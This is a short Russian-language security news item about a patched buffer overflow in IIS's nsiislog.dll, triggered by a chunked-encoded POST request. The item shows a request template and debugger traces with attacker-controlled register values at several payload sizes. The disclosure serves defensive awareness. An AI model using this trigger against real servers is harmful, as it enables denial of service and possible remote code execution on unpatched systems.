На прошлой неделе Microsoft выпустила патч, в котором устраняется уязвимость nsiislog.dll. Сейчас раскрываются подробности обнаруженной уязвимости. 

Уязвимость обнаружена в пути, которым nsiislog.dll обрабатывает поступающие запросы. Атакующий может послать специально сформированный запрос серверу, чтобы аварийно завершить работу IIS Web сервера. 

Уязвимость связанна с переполнением буфера в nsiislog.dll при регистрации некоторых некорректных запросов. Посылая chunked encoded POST к nsiislog.dll, можно вызвать переполнение буфера. Пример: 

POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
Using Size: 121
Connecting....Sending Buffer....

78003F25 dec dword ptr [ecx+0ACh]
-
7800F5ED dec dword ptr [esi] ESI = 58585858

Using Size: 510
Connecting....Sending Buffer....

77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858

Using Size: 5000
Connecting....Sending Buffer....

40F01DCC rep movs dword ptr [edi],dword ptr [esi]
-
77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858
ECX = 58585858

Уязвимость может использоваться для выполнения произвольного кода на уязвимой системе.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии